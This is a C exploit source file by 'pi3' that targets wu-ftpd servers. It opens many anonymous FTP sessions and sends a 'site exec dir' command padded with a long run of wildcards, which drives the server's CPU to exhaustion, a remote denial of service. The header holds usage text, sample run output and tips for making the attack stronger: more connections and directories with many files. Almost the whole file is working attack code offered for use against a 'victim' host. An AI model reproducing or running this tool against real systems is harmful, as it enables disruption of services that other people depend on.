/*
 * Exploit for wu-ftpd all versions by pi3 (pi3ki31ny).
 *
 * How to use? To saw effect you can run only one process this exploit. Example:
 *
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# cc p_wu.c -o p_wu
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu
 *
 *
 *         ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
 *
 *                 [*] Ussage: ./p_wu [options]
 *
 *         Options:
 *
 *                 -v <victims hostname>
 *                 -o [   port                   - standard -> 21              ]
 *                 -l [   login                  - standard -> ftp             ]
 *                 -p [   password               - standard -> daj@na.wino     ]
 *                 -i [   how many connections   - standard -> 15              ]
 *                 -c [   directory              - standard -> don't change    ]
 *                 -h This stupid help screen...
 *
 *
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu -v 0
 *
 *
 *         ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
 *
 *         [*] Connected to: 0
 *         [*] Banner: 220 darkstar.example.net FTP server (Version wu-2.6.2(1) Fri Oct 22 02:54:53 CEST 2004) ready.
 *         [*] Sending USER: ftp...                OK!
 *         [*] Sending PASS: daj@na.wino...        OK!
 *         [*] Sending evil command...             OK!    < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 >
 *
 *
 * root@dpi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ps aux |grep ftpd
 * ftp       1592  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1594  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1596  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1598  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1600  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1602  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1604  6.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1606  6.7  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1608  6.5  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1610  6.3  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1612  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1614  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1616  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1618  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1620  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd#
 * 
 * And what we can saw wu-ftpd ate all free CPU power... but this do only 15 connections.
 * Very good effect i have with running ~20 - ~30 sesion after that my system will
 * work very slow (i can't do in practical nothink! - use option -i to change how many times sploit
 * will be connect to server and use bug).
 *
 * Btw. Try always to change directory where is more files / directories it's better for sploit ;-)
 *
 * Ok. Thanks for read this shit and let's go to ate CPU power! ;-)
 *
 * Special greetz: appelast
 * Greetz: [greetz on my web] && other my friends (you know who you are)
 *
 *         ...::: -=[ www.pi3.int.pl ]=- :::...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <getopt.h>

#define TRUE     1
#define FALSE    0
#define FAL_EX  -1

#define BUFS 210
#define PORT 21
#define LOGN "ftp"
#define PASS "daj@na.wino"
#define SA struct sockaddr
#define pi3 TRUE

int vrfy(int mode, char *ans) {

   if (mode == 1) {
      if(!strncmp(ans, "331", 3))
        return TRUE;
      else
        return FALSE;
   }
   
   if (mode == 2) {
      if(!strncmp(ans, "230", 3))
	return TRUE;
      else
	return FALSE;
   }
   
   if (mode == 3) {
      if(!strncmp(ans, "200", 3))
        return TRUE;
      else
        return FALSE;
   }
   
   if (mode == 4) {
      if(!strncmp(ans, "250", 3))
        return TRUE;
      else
        return FALSE;
   }
}

void ussage(char *arg) {
   
   printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
   printf("\n\t\t[*] Ussage: %s [options]\n\n",arg);
   printf("\tOptions:\n\n");
   printf("\t\t-v <victims hostname>\n");
   printf("\t\t-o [   port                   - standard -> 21              ]\n");
   printf("\t\t-l [   login                  - standard -> ftp             ]\n");
   printf("\t\t-p [   password               - standard -> daj@na.wino     ]\n");
   printf("\t\t-i [   how many connections   - standard -> 15              ]\n");
   printf("\t\t-c [   directory              - standard -> don\'t change    ]\n");
   printf("\t\t-h This stupid help screen...\n\n\n");
   exit(FAL_EX);
   
}

int main(int argc, char *argv[]) {
   
   char buf[BUFS],line[100],tmp_buf[200],*login=LOGN,*pass=PASS,*victim=NULL,*cwd=NULL;
   long inet;
   int pid,sockfd,i,port=PORT,opt=FALSE,ret_vrfy=FALSE,tmp,howmuch=15;
   struct sockaddr_in servaddr;
   struct hostent *h;
   
   if (argc<2)
     ussage(argv[FALSE]);
   
   while((opt = getopt(argc,argv,"v:o:l:p:c:i:h")) != FAL_EX) {
      
      switch(opt) {
	 
       case 'v':
	 
	 victim=optarg;
	 if ( (h=gethostbyname((char*)optarg)) == NULL) {
	    printf("Gethostbyname() field!\n");
	    exit(FAL_EX);
	 }
	 memcpy (&inet, h->h_addr, 4);
	 break;
	 
       case 'o':
	 
	 port=atoi(optarg);
	 break;
	 
       case 'l':
	 
	 login=optarg;
	 break;
	 
       case 'p':
	 
	 pass=optarg;
	 break;
	 
       case 'c':
        
         cwd=optarg;
	 break;
	 
       case 'i':
       
         howmuch=atoi(optarg);
	 break;
	 
       case 'h':
       default:
	 
	 ussage(argv[FALSE]);
	 break;
	 
      }
   }
   
   servaddr.sin_family      = AF_INET;
   servaddr.sin_port        = htons(port);
   servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
   
   bzero(buf,sizeof(buf));
   strcpy(buf,"site exec dir ");
   for (i=FALSE;i<192;i++)
     buf[14+i] = '*';
   strcat(buf,".*\n");

   for (tmp=FALSE;tmp<howmuch;tmp++) {
      
      if ( (sockfd=socket(AF_INET,SOCK_STREAM,FALSE)) <FALSE ) {
	 printf("Socket() error!\n");
	 exit(FAL_EX);
      }
      
      if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) <FALSE ) {
	 printf("Connect() error!\n");
	 exit(FAL_EX);
      }
      
      if (tmp==FALSE) {   
	 printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
	 printf("\n\t[*] Connected to: %s\n",victim);
      }
      bzero(tmp_buf,sizeof(tmp_buf));
      
      i=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host baner...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      tmp_buf[strlen(tmp_buf)-1]='\0';
      if (tmp==FALSE)
	printf("\t[*] Banner: %s\n",tmp_buf);
      bzero(tmp_buf,sizeof(tmp_buf));
      snprintf(tmp_buf,sizeof(tmp_buf),"USER %s\n",login);
      if (tmp==FALSE)
	printf("\t[*] Sending USER: %s... ",login);
      
      i=FALSE;
      if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	 printf("I can\'t write to source host login...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      if ( (ret_vrfy=vrfy(TRUE,tmp_buf)) == FALSE) {
	 printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
	 exit(FAL_EX);
      }
      
      if (tmp==FALSE)
	printf("\t\tOK!\n");
      i=FALSE,bzero(tmp_buf,sizeof(tmp_buf));
      snprintf(tmp_buf,sizeof(tmp_buf),"PASS %s\n",pass);
      if (tmp==FALSE)
	printf("\t[*] Sending PASS: %s... ",pass);
      
      if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	 printf("I can\'t write to source host password...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      if ( (ret_vrfy=vrfy(TRUE+1,tmp_buf)) == FALSE) {
	 printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
	 exit(FAL_EX);
      }
      
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
      if (tmp==FALSE)
	printf("\tOK!\n");
      
      if (cwd!=NULL) {
	 snprintf(tmp_buf,sizeof(tmp_buf),"CWD %s\n",cwd);
	 if (tmp==FALSE)
	   printf("\t[*] Changing directory: %s... ",cwd);
	 
	 if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	    printf("I can\'t write to source host change directory...\nExiting...\n\n");
	    exit(FAL_EX);
	 }
	 
	 bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
	 if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	    printf("I can\'t read from source host...\nExiting...\n\n");
	    exit(FAL_EX);
	 }
	 
	 if ( (ret_vrfy=vrfy(TRUE+3,tmp_buf)) == FALSE) {
	    printf("Error! server don\'t answer with code 250!\n(if it\'s normal \
ignore this in source code!)\n\n");
	    exit(FAL_EX);
	 }
	 bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
	 if (tmp==FALSE)
	   printf("\tOK!\n");
      }
      
      if (tmp==FALSE)
	printf("\t[*] Sending evil command...");
      
      if ( (i=write(sockfd,buf,strlen(buf))) == FAL_EX) {
	 printf("I can\'t write to source host evil command...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      if (tmp==FALSE)
	printf("\t\tOK!    < %d",tmp+1);
      if (tmp!=FALSE)
	printf(" %d",tmp+1);
   }
   
   printf(" >\n\n\n");
   return pi3;
}